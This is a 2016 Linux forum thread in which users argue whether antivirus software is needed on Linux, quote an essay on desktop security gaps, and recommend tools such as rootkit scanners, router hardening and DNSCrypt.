Author Topic: When they ask you what antivirus software you use with Linux.  (Read 5847 times)

Offline DOSfan

  • Newly Subscribed
  • *
  • Posts: 17
  • Karma: 5
  • New Forum User
    • View Profile
  • Peppermint version(s): PeppermintOS 7
Re: When they ask you what antivirus software you use with Linux.
« Reply #15 on: September 11, 2016, 02:39:21 pm »
Show me where that article states 900 viruses ?

You make a good point.  I admit that I did assume that most (if not all) of the 900 were virii, since they were testing anti-virus software.  But since a good AV program will check for other known vulnerabilities, there is no reason that the virii portion couldn't be half, or even less, of that number.

Now the real question is:  If AV-Test checked against 900 known Linux attacks (and no, that isn't necessarily all the known attacks) just how many Linux boxes out there are infected and people don't know because they have been mistakenly led to believe that AV is unnecessary?

I'm sure many of the users here (assuming they are old enough) have their own horror stories of friends or family who didn't know to run AV on their Windows machines and thought they were fine.

As I hinted earlier when mentioning my Windows history, just because you know no malware is on your system, doesn't mean you aren't infected.

EDITed to add:
Well I came across this site for security a while back:

https://www.thefanclub.co.za/how-to/how-secure-ubuntu-1604-lts-server-part-1-basics

I have been using RKHunter and CHKRootKit which seem thorough as well as the IP spoofing tweak in both firefox and Peppermint 7  ;)

That is a very good guide.  Too bad those couldn't be the default installs on linux machines, since it falls outside the basic users comfort level.
« Last Edit: September 11, 2016, 02:43:19 pm by DOSfan »

Offline PCNetSpec

  • Administrator
  • Hero
  • *****
  • Posts: 26452
  • Karma: 65531
  • "-rw-rw-rw-" .. The Number Of The Beast
    • View Profile
    • PCNetSpec
  • Peppermint version(s): Peppermint 10
Re: When they ask you what antivirus software you use with Linux.
« Reply #16 on: September 11, 2016, 03:05:28 pm »
Okay I was going to leave it but this:-

Quote
just how many Linux boxes out there are infected and people don't know because they have been mistakenly led to believe that AV is unnecessary?

is just offensive .. I'm one of those that advise it's not necessary and that's not a mistake.

Stop believing the press and AV community (who both have a vested interest in spreading FUD) and study how Linux works ..

a) how it would be nearly impossible to get malicious code into the software chain in the first place.
b) the fact that binary executable arriving from the web have their execute bit disabled
c) how any executable in your home folder can't break out unless you specifically make it executable then run it with elevated privileges
d) how things cannot traverse the network from machine to machine without having the execute bit disable
e) find ANYWHERE that shows what all these so called viruses are, and shows their attack vector doesn't require local access or (hard to achieve) stupidity on the part of the user.

and most of all trust the fact that in 7 years of using Linux and installing it on MANY machines I have not come across a single virus (though there have been many discovered exploits in this time .. ALL patched quicker than an AV company could respond) .. nor have I seen a SINGLE verifiable infection mentioned online that wasn't by someone who stands to gain by the FUD and showed the attack vector in a meaningful way.

Viruses are so rare in the Linux world as to be insignificant, nobody writes them because they can't spread and can do very little damage .. hacks are a different matter but are quickly patched against .. AV would not help here unless maybe your updater was broken or you'd been stupid enough to disable it.

That article (as usual) doesn't give ANY details and is so vague as to be meaningless .. even if I were to trust an article by and quoting vague figures by an industry that stands to gain from this FUD.

Show me the evidence .. clear concise evidence that shows the remote attack vector, and how it could spread (and has in the real world) about a SINGLE Linux virus.
And on the off chance you can find some historical reference to a real virus that managed to infect a handful of Linux boxes .. show how running AV would have mitigated it.

Stick to the default repos and stay updated, and you are safer than ANY AV could ever make you .. be an idiot and install from unknown locations and no AV will help you anyway as it CANNOT protect against stuff not in its definitions.
« Last Edit: September 11, 2016, 03:40:11 pm by PCNetSpec »
WARNING: You are logged into reality as 'root' .. logging in as 'insane' is the only safe option.

Team Peppermint
PCNetSpec

Offline perknh

  • Trusted User
  • Hero
  • *****
  • Posts: 4013
  • Karma: 373
  • Soy un huevo, nada más.
    • View Profile
  • Peppermint version(s): Peppermint 10
Re: When they ask you what antivirus software you use with Linux.
« Reply #17 on: September 11, 2016, 03:17:16 pm »
Hi DOSfan,

As I hinted earlier when mentioning my Windows history, just because you know no malware is on your system, doesn't mean you aren't infected.

I've seen this with my own eyes watching an AV program in an unsupported Widows XP computer go haywire every 10 minutes.  Linux, fortunately, is built differently than Window.  And, for this, I will always be grateful to Linux.  This YouTube video, says pretty much what PCNetSpec just said.  But, you might enjoy it anyway.  ;)


Why Linux is Safer than Windows or MacOS

by Kris Occhipinti --posted on YouTube

Code: [Select]
https://www.youtube.com/watch?v=n4PGJbDlvsU
[T]here are a lot of people happily running Peppermint ICE which hasn't been receiving ANY updates for a while now .. and I personally would STILL consider that MUCH more secure than any version of Windows with up-to-date AV/Anti-malware ;)

--  PCNetSpec, Cornwall, Eng.  Dec 03, 2013 5:18 pm

Offline DOSfan

  • Newly Subscribed
  • *
  • Posts: 17
  • Karma: 5
  • New Forum User
    • View Profile
  • Peppermint version(s): PeppermintOS 7
Re: When they ask you what antivirus software you use with Linux.
« Reply #18 on: September 12, 2016, 02:48:24 pm »
trust the fact that in 7 years of using Linux and installing it on MANY machines I have not come across a single virus

Did you look / scan for them?  Did you even think about looking for them?

Obviously, you will not find something if you never look for it.  That is just simple logic at work there.  Don't even need a CompSci degree to understand that.

Look, it doesn't take much.  Just change the knee jerk responce of
Quote
AV is unnecessary
to
Quote
In most situations, AV should be unnecessary

That is all that is needed to reduce the examples of these poor souls who ended up installing a virus due to (emphasis mine):
Quote
The point is that I was dumb enough to think that Ubuntu was secure enough out here in the Linux wonderland that I love so much that I ended up on gnome-look downloading everything that looked cool without examining everything first.

And in closing, I'll leave this quote from this thread:
Quote from: Steve DL
You can install an antivirus if you want. It should not hurt your machine, but don't expect much protection for your system and don't consider yourself entirely safe. The efficacy of antivirus software is very relative, and they're mostly in use to avoid propagate old malware especially if you have Windows machines in your ecosystem. You should expect a performance decrease, though there are no benchmarks of AV performance on Linux as of today so it can't be quantified.

Why is it that you're not safe with just an antivirus? Because they're only one part of the needed mechanisms. At the moment there are a lot of missing tools for desktop security on Linux. What are the different security mechanisms relevant to desktops?

    Graphic stack security (to prevent keyloggers, clickjacking, screen recording, clipboard sniffing, etc)
    App distribution schemes with security checks (app stores and repositories with static analysis on the apps) and fast security updates
    Malware detection: signature-based (to protect from identified threats) and heuristics-based (or so they say, I've never used any heuristics-based AV and I suspect this is mostly marketing talk to say "we'll throw tons of security warnings at your face when you use a new app")
    Sandboxing (which consists of isolating apps from one another by design)
    Contextual authorisation to use devices and user data with security by designation / user-driven access control / powerboxes / contracts ; requires sandboxing

Currently the only decent thing on Linux is the app security updates, through repositories. All the rest is substandard.
Graphic stack security

We're all relying on the X11 graphical server. X.Org existed for 30 years and the original design is still in use in the server. Back in the day there were no desktop security issues and you won't be surprised to learn that it's not secure at all. You have APIs right out of the box for implementing keyloggers, doing remote code exploitations if the user has any root console open, replacing the session locker to steal passwords, etc, etc.

It's hard to evaluate how Windows 8 and OS X fare on this topic because I could not find any detailed explanations on their graphic stack implementation. Their sandboxed apps have restricted access to most obvious attack vectors but it's really unclear how well designed and implemented this all is. It seems to me that Win 8 forcing Store Apps to run fullscreen and one at a time hides issues in designing a full scale secure window manager. There are lots of issues to take into consideration wrt. window position and sizing, use of transparency and fullscreen, etc. when implementing a window manager with security in mind. I have no idea how OS X does.

Linux will be switching to Wayland in the coming years, which is designed with security in mind. We have a clear model of what capabilities should exist and a general idea of how these will be enforced and how authorisation can be obtained. The main person behind this work is Martin Peres though I happen to be involved in discussing the user and developer experience behind the capabilities. Design and development are ongoing so don't expect anything any time soon. Read this post for more information. Wayland will provide security seamlessly when used in conjunction with app sandboxing.
App distribution

Linux has a system of repositories with various levels of trust, which trained our users to rely only on provided apps and to be wary of proprietary code. This is very good in theory.

In practice I don't know a single distributor that enforces even the most basic security checks on their packaged apps. No static analysis whatsoever for weird system calls, and for anything community it's really not clear whether pre- and post-install scripts (which run as root) are verified at all for obvious bad things.

The security checks done on extensions to GNOME Shell are very light and manual, but at least exist. I don't know about KDE's extensions or other apps.

One area where we shine is that we can pull security updates very fast, usually within a few days for any security flaw. Until recently Microsoft was much slower than that, though they caught up.
Malware detection

The only antivirus software I know on Linux is ClamAV. It seems to me that it only works based on signatures, but then again as you pointed out, we don't have any identified desktop malware to protect against.

There probably are people writing Linux desktop malware in the world of Advanced Persistent Threats. See Mask for an example. It's unlikely that standard AV can do anything against those since APT malware authors are usually talented enough to come up with zero-day exploits.

Now, Microsoft advertises fuzz-testing all of its software for tens of thousands of hours, as opposed to virtually no secure coding practices at all in the Linux ecosystem. From personal experiments with fuzzing I'm absolutely convinced that there are a handful of low-hanging zero-day exploits in some popular Linux software. This will come to hit us on the day we have a financially-viable user base for commonplace malware authors, and then we'll see how good ClamAV turns out to be, but I suspect the app update mechanism will have a bigger impact at dealing with discovered vulnerabilities.

Needless to say both Windows and OS X do significantly better than Linux on this criteria.
Sandboxing and contextual authorisation

Both OS X and Windows 8 provide sandboxing for the apps hosted on their store. I'm not done looking into the quirks of OS X, but Windows 8 Store Apps have very serious limitations in terms of languages and APIs supported, available features and general user experience that can be provided with them. That means unsandboxed desktop apps are here to stay and Microsoft's sandboxing will not protect against malware, only against crafted documents in buggy (Store App) software. OS X seems to do much better though any non-store app is not sandboxed, as well.

Linux has no GUI app sandbox working seamless enough at the moment. We have the underlying confinement technology (the best candidates being Containers based on Linux namespaces, see LXC and Docker, and the next-to-best being MAC enforcement systems that would need to be developed to support some amount of dynamicity). We almost have the IPC and process management mechanisms needed to deploy and handle those sandboxed apps thanks to amazing work on kdbus and systemd. There are a few bits missing, with a few proposals being pushed mostly by the GNOME Foundation (see this video on Sandboxing at GUADEC 13). I'm also involved in discussing how access to data and authorisation can occur but there's no consensus between the few interested people, and design and development take time. It'll probably be a couple more years before decent prototypes exist and before sandboxing is deployed to Linux on any relevant scale.

One of the big issues faced on all platforms is finding out how to authorise apps to get access to data and device capabilities at the right scale. That means, how to let them do what they need to do without pestering users with authorisation prompts whilst preventing apps from abusing privileges. There are serious loopholes in how Windows 8 lets Store Apps handle recent documents and apps' futureAccessList. At this stage securing document access further without aggravating the cost of security for developers and users is an open question, which a bunch of people happen to be working on as well :)

Can anyone here dispute all of this?

Can anyone despute any of it?

And with that, I'm out.  Too many arogant, self absorbed, p****s on this forum who care much more about their egos rather than improving the linux community.

As the saying goes, you need me a Hell of a lot more than I need you.  Even if you don't need me, that just illustrates how little I need you.  And Peppermint was such a fine distro...
« Last Edit: September 12, 2016, 03:03:47 pm by PCNetSpec »

Offline PCNetSpec

  • Administrator
  • Hero
  • *****
  • Posts: 26452
  • Karma: 65531
  • "-rw-rw-rw-" .. The Number Of The Beast
    • View Profile
    • PCNetSpec
  • Peppermint version(s): Peppermint 10
Re: When they ask you what antivirus software you use with Linux.
« Reply #19 on: September 12, 2016, 03:25:19 pm »
So your main argument was a copy/paste of a response elsewhere that actually says AV in linux is pretty pointless :-\

The rest doesn't warrant a response.
WARNING: You are logged into reality as 'root' .. logging in as 'insane' is the only safe option.

Team Peppermint
PCNetSpec

Offline perknh

  • Trusted User
  • Hero
  • *****
  • Posts: 4013
  • Karma: 373
  • Soy un huevo, nada más.
    • View Profile
  • Peppermint version(s): Peppermint 10
Re: When they ask you what antivirus software you use with Linux.
« Reply #20 on: October 06, 2016, 04:12:20 pm »
There's an interesting argument presented here that installing an antivirus in Linux can actually make an ordinary home user less safe than not installing one.  Wow! :o
[T]here are a lot of people happily running Peppermint ICE which hasn't been receiving ANY updates for a while now .. and I personally would STILL consider that MUCH more secure than any version of Windows with up-to-date AV/Anti-malware ;)

--  PCNetSpec, Cornwall, Eng.  Dec 03, 2013 5:18 pm

Offline acer

  • Member
  • ***
  • Posts: 243
  • Karma: 40
    • View Profile
  • Peppermint version(s): Peppermint 9R x86/ 10 x64
Re: When they ask you what antivirus software you use with Linux.
« Reply #21 on: October 07, 2016, 01:01:26 am »
Anti-virus isn't required in Linux.
I'm pretty sure that will change in time but for now, not needed.

I'd be more worried about using the modem/router supplied by your ISP  :P

'Just because your paranoid, doesn't mean they are not out to get you' springs to mind.  :)

Offline perknh

  • Trusted User
  • Hero
  • *****
  • Posts: 4013
  • Karma: 373
  • Soy un huevo, nada más.
    • View Profile
  • Peppermint version(s): Peppermint 10
Re: When they ask you what antivirus software you use with Linux.
« Reply #22 on: October 07, 2016, 04:19:28 am »
I'd be more worried about using the modem/router supplied by your ISP  :P

Interesting that you said that, after reading the article I did disable Universal Plug and Play (UPnP) in my router.  PCNetSpec already helped me protect my router from WAN attacks. 

'Just because your paranoid, doesn't mean they are not out to get you' springs to mind.  :)

True!  ;D 

Even Yahoo comes to mind, China too, and now, Yandex.  How does one protect oneself from the usually well-intended, but frequently misguided, governmental policy and tampering?  Disregarding all the Creeple Peeple that are out there trying to create mischief, worldwide governmental policies often appear to be unwittingly making matters worse and not better for the ordinary Joe and Jane who just wants to use his or her computer with security, privacy, and peace.

[T]here are a lot of people happily running Peppermint ICE which hasn't been receiving ANY updates for a while now .. and I personally would STILL consider that MUCH more secure than any version of Windows with up-to-date AV/Anti-malware ;)

--  PCNetSpec, Cornwall, Eng.  Dec 03, 2013 5:18 pm

Offline acer

  • Member
  • ***
  • Posts: 243
  • Karma: 40
    • View Profile
  • Peppermint version(s): Peppermint 9R x86/ 10 x64
Re: When they ask you what antivirus software you use with Linux.
« Reply #23 on: October 07, 2016, 05:12:55 am »
UPnP has always been an issue since around the turn of the millenium.

Nowadays ISP's are to blame for this due to leaving ports open to facilitate internet TV and THEY know it.
The problem lies in the TV/console or any other attached device that can't open/close/hide the port once it's switched off from the internet.

The one common denominator to bad security is the router, I've seen it in so many home-users set-up who are oblivious to the potential.

I for one, can state I wont be getting a smart meter from energy suppliers if this is the way things are to continue.  :P

If your interested, try the Gibson Research website and check your settings with Shields UP!
I've been using it for years and find it a great resource to check the security of your own setup.

https://www.grc.com/x/ne.dll?bh0bkyd2

Offline perknh

  • Trusted User
  • Hero
  • *****
  • Posts: 4013
  • Karma: 373
  • Soy un huevo, nada más.
    • View Profile
  • Peppermint version(s): Peppermint 10
Re: When they ask you what antivirus software you use with Linux.
« Reply #24 on: October 07, 2016, 08:47:30 am »
Hi acer,

Shields UP is great, as is the DNSCrypt proxy tool...which can even found in our package manager (dnscrypt-proxy) from Synaptic.  ;)

Yandex browser beta is heavily into using DNSCrypt.  That's where I discovered the idea of DNSCrypt in the first place.  Might be worth a look-see, but, impressive as it is, I wouldn't stay with the browser too too long now .  The Russian government's new policy of ordering that all Russian private tech companies to hand over their encryption keys is really quite a turn off.

But if you have a little patience, and you want to out check out Yandex browser beta, I think you'd find it to be quite impressive.  It's minimalist, lightning fast, and, if you enable DNSCrypt, very, very secure...that is except if, or when, Russia's Big Brother decides arbitrarily that you are a person of interest...or worse, a vector for some digital mischief!  :-X

Bummer too, Yandex is a spectacular company.  Yandex browser beta WAS my new favorite browser --because of its minimalism, speed and use of DNSCrypt.

But without any doubt, we know one thing for certain; we don't need, or even want to use, antivirus software with Linux!  :)

perknh

[T]here are a lot of people happily running Peppermint ICE which hasn't been receiving ANY updates for a while now .. and I personally would STILL consider that MUCH more secure than any version of Windows with up-to-date AV/Anti-malware ;)

--  PCNetSpec, Cornwall, Eng.  Dec 03, 2013 5:18 pm

Offline scifidude79

  • Hero
  • *****
  • Posts: 4029
  • Karma: 870
    • View Profile
  • Peppermint version(s): Peppermint 9
Re: When they ask you what antivirus software you use with Linux.
« Reply #25 on: October 07, 2016, 08:55:47 am »
Anti-virus isn't required in Linux.
I'm pretty sure that will change in time but for now, not needed.

Maybe it will, maybe it won't.  First, somebody has to figure out how to make a virus that can attack Linux.  That's easier said than done, since Linux doesn't have the gaping security holes that other operating systems do.  Also, with a community of people watching the code worldwide, security holes are quickly plugged up via patch updates.  Then there's the other thing about Linux, it requires you to enter an admin password to make system level changes.  Since viruses run amuck and make system level changes, you'd basically have to give the virus permission to run.  I'm sure virus coders haven't figured out a way around that one.  Until they do, a virus could literally sit there on your system and do absolutely nothing.

Offline acer

  • Member
  • ***
  • Posts: 243
  • Karma: 40
    • View Profile
  • Peppermint version(s): Peppermint 9R x86/ 10 x64
Re: When they ask you what antivirus software you use with Linux.
« Reply #26 on: October 07, 2016, 10:14:16 am »
Shields UP is great, as is the DNSCrypt proxy tool...which can even found in our package manager (dnscrypt-proxy) from Synaptic.  ;)
So does this work on the same level as HTTPS Everywhere with the addition of your DNS connection ?
Will check it out thanks.
But without any doubt, we know one thing for certain; we don't need, or even want to use, antivirus software with Linux!  :)
With you on that comment  ;)

Maybe it will, maybe it won't.  First, somebody has to figure out how to make a virus that can attack Linux.  That's easier said than done, since Linux doesn't have the gaping security holes that other operating systems do.  Also, with a community of people watching the code worldwide, security holes are quickly plugged up via patch updates.  Then there's the other thing about Linux, it requires you to enter an admin password to make system level changes.  Since viruses run amuck and make system level changes, you'd basically have to give the virus permission to run.  I'm sure virus coders haven't figured out a way around that one.  Until they do, a virus could literally sit there on your system and do absolutely nothing.
Linux as is, won't get infected due to the structure of the system, that I am aware of but, I don't have a crystal ball for the future or maybe I do..it's just cloudy!
(the cloud is a different kettle of fish)
As perknh says 'we don't need, or even want to use, antivirus software with Linux!'  ;)
« Last Edit: October 07, 2016, 10:16:26 am by acer »

Offline perknh

  • Trusted User
  • Hero
  • *****
  • Posts: 4013
  • Karma: 373
  • Soy un huevo, nada más.
    • View Profile
  • Peppermint version(s): Peppermint 10
Re: When they ask you what antivirus software you use with Linux.
« Reply #27 on: October 07, 2016, 04:36:53 pm »
So does this work on the same level as HTTPS Everywhere with the addition of your DNS connection ?

Yeah, that's the analogy OpenDNS uses to describe the principle behind DNSCrypt:

https://www.opendns.com/about/innovations/dnscrypt/

[T]here are a lot of people happily running Peppermint ICE which hasn't been receiving ANY updates for a while now .. and I personally would STILL consider that MUCH more secure than any version of Windows with up-to-date AV/Anti-malware ;)

--  PCNetSpec, Cornwall, Eng.  Dec 03, 2013 5:18 pm